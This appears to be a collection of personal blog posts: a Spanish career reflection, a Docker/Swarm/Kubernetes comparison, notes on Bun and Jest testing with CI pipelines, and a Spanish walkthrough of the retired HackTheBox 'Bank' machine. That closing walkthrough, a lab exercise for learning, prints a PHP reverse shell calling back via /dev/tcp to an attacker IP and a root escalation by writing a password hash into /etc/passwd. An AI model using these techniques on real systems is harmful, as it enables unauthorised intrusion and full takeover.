Actualmente, sigue estando muy saturado, cuando salí de mi primer trabajo con casi 2y de experiencia, me costaba más conseguir entrevistas que el primero y mi segundo trabajo termine tomando uno a modo desesperación que termino siendo una horrible experiencia, las personas a nivel técnico eran lo mejor, pero la parte gerencial fue una completa explotación y maltrato que termine renunciando a los 4 meses. Inclusive después de esto empecé a cambiar de rol, empecé como desarrollador web, pero empecé a interesarme más por el área de infraestructura, así que arranque mi transición hacia ese rol. Así que deje mi cargo de SSR Software Developer por pasar a ser un JR como DevOps que fue el cargo inicial que conseguí, a principio me costó bastante claro porque a pesar de estarme preparando varios meses es bastante diferente al cargo de dev, pero aun así entre el tiempo que le dedique trabajando y por fuera a los 6 meses ya me sentía totalmente cómodo y empecé a contribuir en las decisiones de arquitectura en los productos, como también a los 12 meses de estar ahí me pidieron que empiece a tomar entrevistas técnicas, hoy en día tengo gente a cargo, mentoreo equipos, defino prácticas y lineamientos (tanto para áreas de desarrollo como para áreas de infra).

Ahora una opinion personal respecto a esto mismo, una vez que esten dentro y le dediquen suficiente tiempo van a ver que no hay tanta gente buena, la mayoria solo esta donde esta por el tiempo, pero la falta de ganas y amor por lo que uno hace es impresionante, entiendo los puntos de vista de las personas que tienen familia, que quizas no les sobra ni una hora en el dia para hacer algo y que cada uno vive su vida como quiere, pero aun asi la negacion en mejorar en siquiera las horas de trabajo u de escuchar una opinion ajena y creer que saben todo es impresionante, no tengan miedo el mercado esta lleno de gente mediocre, solo tienen que crecer un poco

¿Como puedo escalar?

Posiblemente se pensaran en algun momento, por solo tener mas exp eso nos da mas seniority? ni, para el mercado quizas si pero pueden tener 5y y seguir siendo juniors a nivel responsabilidades por que efectivamente nunca se gastaron en mejorar.

Bueno siendo eso el caso vamos a pensar como mejorar, primero como JR se la van a pasar haciendo tareas, no las mas complejas pero van a hacer miles de cosas, como son el cargo menos importante les van a tirar muchisimo para hacer, a veces mas que el SSR pero mas cocinado (indicaciones, ayuda, etc) pero en mismas cantidades, con el fin de que ustedes puedan aprender, lo primero que tienen que priorizar es en cumplir, una vez vean que cumplan es asegurar de mejorar su nivel de autonomia, como tambien a hacer mas con menos, de dejar mas libre a las personas de cargos mas importantes y tratar de aportar mas a la empresa/proyectos con menos recursos, como tambien a empezar a pensar mejores soluciones, quizas no tengan la oportunidad en el trabajo pero en su tiempo libre para aprender hagan muchos refactors, re-inventen la rueda y hagan todo lo mas estupidamente complejo que puedan sin sentido alguno, esto en el trabajo no es aplicable pero en su tiempo libre si por que les da mejor entendiento de como funciona lo que hacen como tambien pueden mejorar cada uno de sus procesos en base a darse cuenta, a esto lo hacian de forma X por esto, despues de un tiempo van a ver que como JR van a sentir que en algunas cosas tienen el nivel tecnico de alguien de un puesto mas elevado al menos para las tareas que les asignan o que les empieza a sobrar mucho tiempo, aca es donde vamos a tener 3 tipos de personas

Quien prefiere tomar cosas mas dificiles en el trabajo

Este es el camino mas apresurado posiblemente, si empezamos a pedir tareas mas complicadas o querer que nos metan en temas complejos (los que suele estar un SSR para empezar) sabemos que ya vamos encaminados hacia ahi sin tener que dedicar tiempo por fuera del trabajo, pero esto va a depender mucho del nivel de la empresa, los equipos y demas. Puede pasar que como JR ya tengan tareas complicadas y su esfuerzo no se vea reflejado

Quien prefiere usar el tiempo libre para hacer lo que quiera

Este es mi caso, yo como mi entorno no me es de mucha ayuda para progresar, utilizo el tiempo que me sobra para ponerme nuevos retos yo mismo y mejorar a mi manera como siempre lo hice, al fin y al cabo llegue a donde estoy gracias a mi dedicacion y todo lo que aprendi por fuera, el trabajo fue de ayuda pero siempre aprendi mas por mi cuenta

Quieren prefiere mantener un perfil bajo

Siempre va a existir el tipo de persona que prefiere hacer lo que tiene que hacer y irse a la casa o apagar la compu, asi que no hay problema si prefieren crecer por como lo estipula la empresa y quizas esperar 3y para subir de puesto esta bien no pasa nada, el mercado por el tiempo que uno tiene en una empresa igualmente les va a pagar mas con el tiempo

Pensemos en el negocio y los equipos

Esto se puede hacer desde ser JR, pero en caso que no lo hagamos es algo requerido para llegar a SR, ya que en base a eso vamos a ver donde alocar recursos, entender las capacidades de los equipos y asignar personas adecuadas a las tareas, ver que informacion brindar a puestos superiores y muchas cuestiones mas

Disclaimer

Todo esto se basa en mi experiencia personal y si bien considero que todas son validas, las personas que estan hace mucho en la industria no tuvieron que pasar por esta lucha de que te postulabas a una vacante de JR y habia ya 2000 personas en 2hs, donde todos estan sobrecalificados y no te aceptan por que no cumpliste los requisitos adicionales, quien empezo hace poco considero su opinion para personas nuevas, ya si hablamos para como hacer buen software y otras cuestiones de como funcionan las empresas, siempre escuchen a las personas con mas experiencia, mi idea era expresar mas como superar la lucha que tuve (y algunos todavia tienen) contra lo enorme que es el mercado hoy en dia en los puestos bajos.

Today we are going to talk about the differences about each of some of the popular options out there (and the ones that I tested myself) article is inspired by https://phoenixnap.com/blog/kubernetes-vs-docker-swarm

In today computation we are going to evaluate the following points and my personal thoughts about why should we consider all the options (and more, ej podman)

Installation

Docker

Straight forward in all cases and distros, you probably won’t need any sort of instruction outside the documentation to land using docker.

Swarm

Since swarm comes with docker in most distros, you are already there!

Kubernetes

So here things get a little tricky, because kubernetes it’s a suite of components, when we talk about kubernetes we often refer to the cluster itself already working, but to get there we need things like kubeadm or kubectl, from there we can create our cluster with more things like minikube, microk8s, k3s. These provide functionality for the cluster, while the other tools mentioned provide a way to operate with them. You can read more about each one here https://www.linkedin.com/pulse/understanding-kubeadm-kubelet-kubectl-aloysius-pious-fqwsc/

And about the components here components are listed here https://kubernetes.io/docs/reference/command-line-tools-reference/

Learning Curve

Docker

For personal usage I’ll say is quite easy, especially if you are only going to use things that other built, then to build larger things or even try to use it in production (don’t, at least use swarm) it becomes quite a challenge, not because is hard but yes because you start to find the limitations of running docker standalone.

Swarm

After using docker itself, I’ll say transitioning into swarm is quite easy, you start seeing a few commands more and that’s all, what is not the same is that we start digging into container orchestrators. But compared to k8s trust me that is really easy!

Kubernetes

If you come from docker standalone, the concept of container orchestrators itself is going to be a challenge for you, coming from swarm I’ll say is hard but doable and healthy, looking into the additional components of kubernetes is up to you how hard it will become, you can start by trying things like minikube and say of wow this is not that hard, but once you start to think about doing a production ready cluster which is the point of kubernetes (if you are not aiming for that is clear that swarm is enough) challenges for your knowledge start to appear

GUI

Docker

Nothing pre-installed, we can use things docker desktop for personal or team usage, portainer, etc

Swarm

Same case as Docker standalone, dozzle is quite nice since it comes with swarm mode

Kubernetes

k8s comes with a dedicated dashboard, but if you are using k3s like myself, portainer is a good option to manage your cluster

The kubernetes dashboard can be found here https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/

Cluster Setup

Docker

N/A

Swarm

To create a cluster is quite easy, we can use the command docker swarm

With the init we start the swarm and with docker swarm join-token we generate a command to join from the other nodes

Then you can check if the nodes are there

From here you can create a compose file and start doing your deploys

Kubernetes

Depending on which engine you are going to use installation varies, in my case i’m using k3s since my cluster is running in multiple Raspberry Pi’s so it comes handy, check https://docs.k3s.io/installation/requirements for details.

After the first installation we will have the cluster with the master node / control-plane, from there we can log in into another machines and do the same with the k3s_token.

To check the state of the cluster and nodes, you can do the following

Scalability

Docker

So we need that our application handles more traffic, if we can to scale we have to of course either expand the resources of the machine, add more replicas (manually) or deploy multiple containers if different machines which a load balancer up front, so docker standalone won’t help us scale, is up to us how we handle it

Swarm

Replicas? easy-peasy, containers across multiple computers? easy-peasy, internal load balancer? easy-peasy, outside automatic horizontal scaling swarm makes really easy this work, it is PERFECT when we have a b2b app or something that we are not going to handle 5000 users and the next day 20 million

Kubernetes

We can’t say much about kubernetes in terms of scalability since it is top-notch, at the cost of the learning curve, and hardware we have all the possible benefits that any company or product needs, I’ll say if you are in a business/product that can grow from day to night, you HAVE to use it. Imagine that you are hosting your website and one day MrBeast decides to promote your site, you know everything is going to blow up that day, kubernetes can save you that day (let’s not talk about $$)

Horizontal auto-scaling

Docker

N/A

Swarm

N/A

Kubernetes

Yes! One of the most useful features, the one that can save you (if you have enough resources to begin) if the example the created above becomes real! :) I’ll leave something to read about it https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/

Monitoring

Docker and Swarm

Third-party tools are your friends

https://docs.docker.com/engine/daemon/prometheus/

https://github.com/louislam/uptime-kuma

Kubernetes

Resources can be found here https://kubernetes.io/docs/tasks/debug/debug-cluster/resource-usage-monitoring/

Load balancer

Docker

N/A

Swarm

Suppressively it comes by default

Here I have a few services running, if I point my reverse proxy to any of that external ports it will internally load balance across the replicas.

Kubernetes

The easiest way is to create a Service alongside a Deployment which the type LoadBalancer. An example can be something like this

## infobae-deployment.yml
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    io.kompose.service: infobae-api
  name: infobae-api-worker
spec:
  replicas: 3
  selector:
    matchLabels:
      io.kompose.service: infobae-api
  template:
    metadata:
      labels:
        io.kompose.service: infobae-api
    spec:
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
            - labelSelector:
                matchLabels:
                  io.kompose.service: infobae-api
              topologyKey: "kubernetes.io/hostname"
      containers:
        - image: dyallo/infobae_api
          name: infobae-api
          ports:
            - containerPort: 3000
              protocol: TCP
      restartPolicy: Always

## infobae-service.yml
apiVersion: v1
kind: Service
metadata:
  labels:
    io.kompose.service: infobae-api
  name: infobae-api
spec:
  ports:
    - name: 'tcp'
      port: 3000
      targetPort: 3000
  selector:
    io.kompose.service: infobae-api
  type: LoadBalancer

Then we can do run them with kubectl apply -f . if both files are in the same folder.

More information can be found here https://kubernetes.io/docs/tasks/access-application-cluster/create-external-load-balancer/

Security

All

We can say that all of them have a lot of security options if we dig enough, good resource are

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security

https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html

which I suggest learning in docker at least is capabilities, security_opts, apparmor, seccomp and Dockerfiles with the least privilege or distroless if applies.

I’ll leave an example of a docker-compose with some of the practices mentioned

services:
  waifuland:
    container_name: waifuland
    security_opt:
      - seccomp:seccomp.json
      - apparmor:non-root-profile
      - no-new-privileges:true
    build:
        context: ../
        dockerfile: docker/Dockerfile
    cap_add: ["DAC_OVERRIDE"]
    cap_drop: ["ALL"]
    restart: always
    env_file:
      - ../.env
    ports:
      - ${EXTERNAL_PORT}:${PORT}
    networks:
      - waifuland

networks:
    waifuland:
        driver: bridge

CLI

Docker

Docker engine itself comes with the docker command which is their own cli to manage both docker standalone and docker swarm

Swarm

Same as docker, with different commands

Kubernetes

The components of Kubernetes itself don’t include a CLI, you have to install it yourself.

Use case

Docker

Let’s say you are trying a new tool, building a feature or anything for development, docker standalone works perfect since the container is going to use the image that the server runs in the end.

Proof of concepts are also welcome since you can run services locally without the need of deployments.

Small companies who have environments which can vary in dependencies and want to regulate their deployments can decide to start using docker, which a really low cost.

All sort of companies can benefit from docker standalone, I’ll not recommend docker standalone for critical applications or core.

Swarm

So swarm is a big step already, one big candidate for swarm for me is B2B models where traffic or users vary only if we got new clients, our application can maybe live with the amount of users that is there and not ground since is a niche market or when is going to grow we now the exact number of users/traffic that we are going to receive so we can scale up in advance, the tools that swarm offers are not automatic but are easy to set up and effective.

Another use case for swarm is the learning process, k8s comes with a big learning curve, if you want to have a more healthy transition going from docker, to swarm, to k8s is going to make your life easier.

Small to medium companies can benefit from docker swarm, I’ll not recommend docker swarm for the core of your business.

Kubernetes

So let’s go with the example from above, MrBeast decides to promote our site, and we know the traffic is going to zero to hero, that’s cool but is not cool if our infrastructure can’t handle that traffic and users receive a painful experience or worst the page is down. With features like horizontal autoscale (as long as we have resources speaking of self-hosted) we can survive this incident, in core or critical applications we NEED things like that where HA is necessary.

So paying the cost of hosting or using/learning is big, but benefit can be also huge if we take the example from above.

K8S is the standard nowadays for enterprise application, my only recommendation is to evaluate each of the needs for the companies, projects and more, you can sometime get away with docker standalone or swarm.

Medium to large companies can benefit from Kubernetes.

You can check the repository i'm using for example here

• Typescript? ✅
• Single Ejecutable File? ✅
• Multiple Architectures? ✅
• Test runner? ✅
• Coverage? ✅
• Pipelines? ✅

With all of these already we can make sure to build a suitable product, giving quality and speed, since all of these things are really easy to setup, let's dive in.

Typing 🟦

We have two ways, use typescript or jsdocs, since I'm already confortable with TS and I know what i'm doing I'll always use JS instead but never lost the habit of adding types thats when jsdocs comes to save the day.

Here is an example of a function using jsdocs in javascript

/**
 * @description Notify the user that the message is too long
 * @param { Object } options - Options object
 * @param { string } options.notification - Message to notify the user
 * @param { string } options.std - Content to be evaluated
 * @param { number } options.maxLength - Max length of the message
 * @param { import("#types").sendMessage } options.fn - Function to send the message
 * @returns { undefined }
 */
function sendMessageIfLong(options) {
  const { notification, std, maxLength, fn } = options;
  const notificationMessage = notification + 'sending in parts...';
  const delay = 2000;
  const isStdValid = std !== null;

  if (isStdValid) {
    const isLargeMessage = std.length > maxLength;
    if (isLargeMessage) {
      fn(notificationMessage || noOutputMessage + 'sendMessageIfLong');
      sleep(delay);
      const splitMessage = splitString(std, maxLength);
      splitMessage.forEach(part => fn(part));
    }
  }
}

Did I mention that we can create documentation with the jsdocs typing? with esdocs we can create something like this! https://bun-template.jonathan.com.ar/

Binary 🔢

But why binarys tho? well not everything is a web!! (you could use it with web anyways if you are lazy and run it with ./binary & if is for a sample project) but now being serious, there are some projects where a binary comes handy and I love to have a easy way to do it, or to not have to install nothing more.

With something like this in our package.json "build": "bun build ./src/index.js --compile --outfile lib/app_name" we are up to go and whats better than having binarys at our disposal?

Architecture 🏚

Having multiple architecture to built in! Yes I love this as a fan of ARM64 or ARMV7 I always had to do work arounds to build docker images and transform apps (mostly for ARMV7 not for ARM64) but anyways, this is so cool. You should give it a try

bun build --compile --target=bun-linux-arm64 ./index.ts --outfile myapp

Testing 🧪

Now here we have two things, the hability to do unit testing with some sort of jest (or also import jest), integration test if we install supertest and add coverage if we configure our bunfig.toml

To add coverage to our projects is something like this

[test]

coverage = true
coverageThreshold = { line = 0.7, function = 0.5 }

It is true that at the time i'm writing this bun do not have any sort of test reporter, which is really needed on enterprise level to create junit files for example and add graphics to platforms like github or azure devops for example. You can follow this thread to get in touch about it here and contribute to make it real

By the way tests are extremely fast!

Here are some of the test that are running

import { SampleApp } from "src";
import { describe, it, expect, beforeAll } from 'bun:test';

describe("SampleApp Class", () => {

    /**
     * @type {SampleApp}
     */
    let sampleApp;

    beforeAll(() => {
        sampleApp = new SampleApp();
    });

    it("should be an instance of SampleApp", () => {
        expect(sampleApp).toBeInstanceOf(SampleApp);
    });

    it("should have a method called 'sampleMethod'", () => {
        expect(sampleApp.sampleMethod).toBeInstanceOf(Function);
        expect(sampleApp.sampleMethod()).toBe("Hello World!");
    });
});

Yes this second one is running against a deployed database and still is running like if it was mocked, hell so fast haha

import { describe, it, expect, beforeAll, afterAll } from 'bun:test';
import { LibsqlDialect } from '@libsql/kysely-libsql';
import { Kysely } from 'kysely';

import { db } from '#db';
import { config } from 'src/config/config';
import { createTable, dropTable } from './utils/sql';

describe('db file', () => {

    /** @type { import("kysely").Kysely<any> } */
    let newDb;

    beforeAll(async () => {
        newDb = new Kysely({
            dialect: new LibsqlDialect({
                url: config.db.url,
                authToken: config.db.authToken
            })
        });
    });

    it('should be an instance of Kysely', () => {
        expect(db).toBeInstanceOf(Kysely);
    });

    it('should be an instance of Kysely', () => {
        expect(newDb).toBeInstanceOf(Kysely);
    });

    it('should create a table with the name of users', async () => {
        await createTable(newDb, 'sampleUsers');
        const usersTable = await newDb.selectFrom('sampleUsers').selectAll().execute();
        expect(usersTable).toEqual([]);
    });

    afterAll(async () => {
        await dropTable(newDb, 'sampleUsers');
    });

});

Pipelines 🚧

Bun already made not only a dockerimage but an action in github, which comes handly to generate our documention, do testing and more things!

Here is a complete example

name: build, test and run

on:
  workflow_dispatch:
  push:
    branches: [ "develop", "master" ]
  pull_request:
    branches: [ "develop", "master" ]

jobs:
  build:
    name: build and test
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/master' || github.ref == 'refs/heads/develop'
    steps:

      - uses: actions/checkout@v4
      - uses: oven-sh/setup-bun@v2
        with:
          bun-version: latest

      - name: set environment variables
        run: |
          touch .env
          echo "DISCORD_TOKEN=${{ secrets.DISCORD_TOKEN }}" >> .env
          echo "TURSO_URL=${{ secrets.TURSO_URL }}" >> .env
          echo "TURSO_TOKEN=${{ secrets.TURSO_TOKEN }}" >> .env

      - name: install dependencies, build and test
        run: |
          bun install
          bun run test
          bun run build:arm

      - uses: actions/upload-artifact@v2
        with:
          name: executor
          path: lib/executor_arm64
          if-no-files-found: error

  run:
    name: run
    runs-on: self-hosted
    if: github.ref == 'refs/heads/master'
    needs: build
    steps:
      - uses: actions/download-artifact@v2
        with:
          name: executor

      - name: move to $HOME/apps
        run: mv executor_arm64 $HOME/apps/executor_arm64

      - name: run executor
        run: |
          chmod +x $HOME/apps/executor_arm64
          $HOME/apps/executor_arm64 &

Conclusion 🏁

Bun is awesome and it makes javascript fun outside the browser without shooting yourself in the leg.

El repositorio que estoy utilizando es un proyecto random que tengo waifuland

Configuracion 🧰

En caso que llegue a ser JS solamente la configuracion es mas simple.

┣ 📄 .env
┣ 📄 .gitignore
┣ 📄 jest.config.js
┣ 📄 jest.setup.js
┣ 📄 package-lock.json
┣ 📄 package.json
┣ 📄 tsconfig.build.json
┗ 📄 tsconfig.json

El testMatch ajustenlo a su necesidad, si no usan TS pueden quitar el transform.

// jest.config.js
/** @type {import('ts-jest').JestConfigWithTsJest} */
module.exports = {
  clearMocks: true,
  coverageProvider: "v8",
  moduleFileExtensions: ["js", "jsx", "ts", "tsx", "json", "node"],
  setupFilesAfterEnv: ["<rootDir>/jest.setup.js"],
  roots: ["<rootDir>/src"],
  testMatch: ["**/__tests__/(unit|integration)/*.[jt]s?(x)", "**/?(*.)+(spec|test).[tj]s?(x)"],
  transform: {
    "^.+\\.(ts|tsx)$": "ts-jest",
  },
};

// jest.setup.js
jest.setTimeout(30000);

Dependencias 🍟

ts-jest No es necesario si solo se usa Javascript.

"scripts": {
    "test": "jest",
    "test:coverage": "jest --coverage"
  },
"devDependencies": {
    "@jest/globals": "^29.7.0",
    "@types/jest": "^29.5.11",
    "@types/node": "^17.0.8",
    "@types/supertest": "^6.0.2",
    "jest": "^29.7.0",
    "supertest": "^6.3.4",
    "ts-jest": "^29.1.1",
    "typescript": "^5.3.3"
  }

Pipeline 🧪

Los env no es necesario si no tienen datos sensibles, yo por que tengo el connection string de la base de datos y mis credenciales de rollbar.

name: CI/CD

on:
  workflow_dispatch:
  push:
    branches:
      - master
      - development
    paths:
      - 'src/**'
      - 'Dockerfile'
  pull_request:
    branches:
      - master
      - development
    paths:
      - 'src/**'
      - 'Dockerfile'

env:
  BRANCH_NAME: ${{ github.ref_name }}

jobs:
  gitleaks:
    uses: jd-apprentice/jd-workflows/.github/workflows/gitleaks.yml@main
    with:
      runs-on: ubuntu-latest
      name: Gitleaks
    secrets:
      gh_token: ${{ secrets.GITHUB_TOKEN }}

  test:
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: '18'

      - run: npm install
      - name: Run tests
        run: |
          touch .env
          echo DB_HOST="${{ secrets.DB_HOST }}" >> .env
          echo PORT=3000 >> .env
          echo NODE_ENV=TEST >> .env
          echo ROLLBAR_TOKEN="${{ secrets.ROLLBAR_TOKEN }}" >> .env
          echo ROLLBAR_ENVIRONMENT=development >> .env
          npm run test

      - uses: ArtiomTr/jest-coverage-report-action@v2.3.0

Tipos de TEST 🧪

Aca les voy a dejar ejemplos de test UNITARIOS y de INTEGRACION, la idea de los unitarios es mockear o simular los diferentes metodos, funciones y demas. Sin probar la integracion completa, se suelen harcodear datos tanto de input como output si es necesario.

Ejemplo de Unitario 📰

🌳 unit/
┣ 📁 mocks/
┃ ┗ 📄 image.ts
┗ 📄 images.test.ts

El mock este es un ejemplo de una de mis apps

// mocks/image.ts
export const image = {
    id: expect.any(String),
    url: expect.any(String),
    is_nsfw: expect.any(Boolean),
    tag: {
        name: expect.any(String),
        tag_id: expect.any(Number),
        description: expect.any(String),
        is_nsfw: expect.any(Boolean),
        createdAt: expect.any(String),
        updatedAt: expect.any(String),
        is_active: expect.any(Boolean)
    }
};

const defaultSize = 1;
const defaultId = '1';
const defaultUrl = 'https://www.example.com/image.jpg';
const defaultNsfw = false;
const defaultTag = {
    name: 'tag',
    tag_id: 1,
    description: 'description',
    is_nsfw: false,
    createdAt: '2021-01-01',
    updatedAt: '2021-01-01',
    is_active: true
};

const defaultImage = {
    id: defaultId,
    url: defaultUrl,
    is_nsfw: defaultNsfw,
    tag: defaultTag
};

export const getImageMock = jest.fn((args = {
    size: defaultSize,
    tag_id: defaultTag.tag_id
}) => {

    let response = Array.from({ length: args.size }, () => defaultImage);

    if (args.tag_id) {
        response = response.map((image) => {
            return {
                ...image,
                tag: {
                    ...image.tag,
                    tag_id: args.tag_id,
                    name: expect.any(String),
                    description: expect.any(String)
                }
            };
        });
    };

    return args.size === 1 ? response[0] : response;
});

// image.test.ts
import { ImageProp } from "../../interfaces/image-interface";
import { getImageMock, image } from "./mocks/image";

describe("UNIT - Images Module", () => {

    beforeAll(async () => {
        jest.resetModules();
    });

    test('GET /api/images - when asking for an image should return a random one', async () => {
        const response = getImageMock({ size: 1 });
        expect(getImageMock).toHaveBeenCalledTimes(1);
        expect(response).toMatchObject(image);
    });

    test('GET /api/images?size=2 - when asking for 2 images should return an array of 2 images', async () => {
        const response = getImageMock({ size: 2 });
        expect(getImageMock).toHaveBeenCalledTimes(1);
        expect(response).toEqual([image, image]);
    });

    test('GET /api/images?size=1&tag_id=2 - when asking for a tag_id should return that one', async () => {
        const response = getImageMock({ size: 1, tag_id: 2 }) as ImageProp;
        expect(getImageMock).toHaveBeenCalledTimes(1);
        expect(response.tag.tag_id).toBe(2);
    });

    test("GET /api/images/all - when asking for all images should return an array of images", async () => {
        const response = getImageMock({ size: 4 }) as ImageProp[];
        expect(getImageMock).toHaveBeenCalledTimes(1);
        expect(response.length).toBe(4);
    });

});

Ejemplo de Integracion 📰

Los test de INTEGRACION son los que prueban algo entero, ej un controlador, como usamos supertest para esto lo que hacemos es hacer llamados HTTP, levantando la app por eso cargo la DB, de ahi le voy haciendo request reales, asi que no hagan esto en PROD, solamente en entornos bajos.

import { loadDatabase } from "../../../app/db";
import Config from "../../../app/config/config";
import { app } from "../../../app/main";

import request from 'supertest';
import { Response } from 'supertest';
import { Server } from 'http';

const baseRoute = '/api/images';
const contentTypeKey = 'Content-Type';
const contentTypeValue = /json/;
const httpSuccess = 200;

export const image = {
    id: expect.any(String),
    url: expect.any(String),
    is_nsfw: expect.any(Boolean),
    tag: {
        name: expect.any(String),
        tag_id: expect.any(Number),
        description: expect.any(String),
        is_nsfw: expect.any(Boolean),
        createdAt: expect.any(String),
        updatedAt: expect.any(String),
        is_active: expect.any(Boolean)
    }
}

describe("INTEGRATION - Images Module", () => {

    let server: Server;

    beforeAll(async () => {
        jest.resetModules();
    });

    beforeEach(async () => {
        server = app.listen(Config.app.port);
        await loadDatabase(Config.db.uri);
    })

    test('GET /api/images - when asking for an image should return a random one', async () => {
        await request(app)
            .get(baseRoute)
            .expect(contentTypeKey, contentTypeValue)
            .expect(httpSuccess)
            .then((response) => expectImage(response));
    });
}

function expectImage(response: Response) {
    expect(response.body).toBeTruthy();
    expect(response.body).toMatchObject(image);
}

Resultados 🏁

Esta es mi pipeline que incluye gitleaks, jest, codacy y dockerhub

La extension para coverage, en caso que quieran despues hacerlo bloqueante

Demostracion de como corren los TEST

Hoy vamos a hacer la maquina Bank la cual es una maquina retirada, dificultad EASY.

Requerimientos para la maquina:

• nmap
• nslookup
• dig
• feroxbuster
• wordlist

Links utiles 🔗

• https://garethkerr.substack.com/p/linux-privilege-escalation-exploiting-d1d
• https://github.com/epi052/feroxbuster
• https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
• https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

User Flag 🧑

Arrancamos por scanear puertos como se suele hacer siempre

nmap -T4 --min-rate 5000 -sV -A -o bank 10.10.10.29
Nmap scan report for 10.10.10.29 (10.10.10.29)
Host is up (0.17s latency).
Not shown: 990 closed ports
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp    open     domain      ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp    open     http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
407/tcp   filtered timbuktu
541/tcp   filtered uucp-rlogin
1521/tcp  filtered oracle
5907/tcp  filtered unknown
8701/tcp  filtered unknown
8994/tcp  filtered unknown
24444/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Viendo que el puerto 53 esta abierto sabemos que hay un dns, al ser bank la maquina podemos suponer que existe el dominio bank.htb el cual es normal en muchas maquinas de htb llamarse como la maquina + .htb, agreguemos esto al /etc/hosts y probemos

cat /etc/hosts             
127.0.0.1       localhost
10.10.10.29     bank.htb

Una vez eso entramos a bank.htb y ahora veremos un portal con un login

Podemos probar cosas basicas como SQL Injection haciendo un 'OR 1=1-- pero no conseguimos nada, asi que lo primero que vamos a hacer es intentar encontrar paginas ocultas, para eso vamos a usar feroxbuster

feroxbuster --insecure -u http://bank.htb -m GET -w ~/Documents/Security/wordlists/directory_list_lowercase_2.3_medium.txt --threads 200 -C 401

De esta forma obtenemos muchisimas paginas, pero la que nos interesa es balance-transter en esta vamos a encontrar un monton de cuentas con extension .acc lo cual si vemos son demasiadas, pero como estamos en un indexador de archivos vamos a ordenar por lo que vamos viendo.

Por el campo Last modified no se ve nada diferente, por Size hay una que pesa 257 lo cual es muy difenrete a la mayoria y se ve que esta es la que nos interesa por que fallo la encryptacion y tiene los datos del usuario

68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

Con esto vamos a volver a la pagina del login e intentar logearnos con estas credenciales.

Nos pudimos logear!

Mirando rapidamente en la pagina dashboard no hay nada interesante, pero en la pagina Support vemos un formulario, veamos como funciona el mismo.

Por lo visto solo podemos subir imagenes

Veamos el source code para ver como funciona esta pagina, viendo el codigo fuente podemos ver un comentario el cual nos falicita mucho las cosas

                <div style="position:relative;">
                        <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
                        <a class='btn btn-primary' href='javascript:;'>
                            Choose File...
                            <input type="file" required style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="fileToUpload" size="40"  onchange='$("#upload-file-info").html($(this).val().replace("C:\\fakepath\\", ""));'>
                        </a>
                        &nbsp;
                        <span class='label label-info' id="upload-file-info"></span>
                </div>

Por lo visto si le agregamos .htb a un archivo estariamos ejecutando codigo php del lado del servidor, con esta informacion vamos a crear una reverse shell de php con extension .htb, algo asi como reverse.php.htb

Algo asi

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.34/4444 0>&1'");
?>

Previo a esto vamos a abrir un servidor de netcat en el puerto deseado (en mi caso 4444)

nc -lvpn 4444

Una vez subido nuestro archivo con la reverse shell con extension .htb vamos a hacerle click donde esta el attachment que dice Click here

Esto va a ejecutar el codigo php y obtenemos reverse shell!

En la carpeta /home/chris/user.txt tenemos la primera flag donde podemos verla con el usuario actual.

Root Flag 🖥

Para enumerar el sistema voy a usar un script llamado linpeas el cual sirve para encontrar vulnerabilidades en los sistemas. Tenemos que subirlo a la maquina lo cual vamos a primero en nuestra maquina host levantar un server de python donde tenemos el script.

sudo python3 -m http.server 8000

Despues en la maquina target vamos a hacer

cd /tmp
wget <TU_IP:8000>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

En el reporte de linpeas podemos ver lo siguiente

Interesting writable files owned by me or writable by everyone (not in Home) (max 500)                                                                       
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                         
/etc/passwd

Viendo que tenemos permisos de escritura en el /etc/passwd podemos agregarle una password al usuario root de la siguiente manera

openssl passwd hola
P6afTBIDyFGYE

Esto lo vamos a agregar en /etc/passwd

www-data@bank:/tmp$ cat /etc/passwd                                                                                                                             
root:x:0:0:root:/root:/bin/bash                                                                                                                       
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin                                                                                                              
bin:x:2:2:bin:/bin:/usr/sbin/nologin

Donde va la x en root, vamos a agregar el hash que nos dio el openssl

root:P6afTBIDyFGYE:0:0:root:/root:/bin/bash

Ahora vamos a hacer un su y escribimos la password que usamos antes hola

Conclusion 🏁

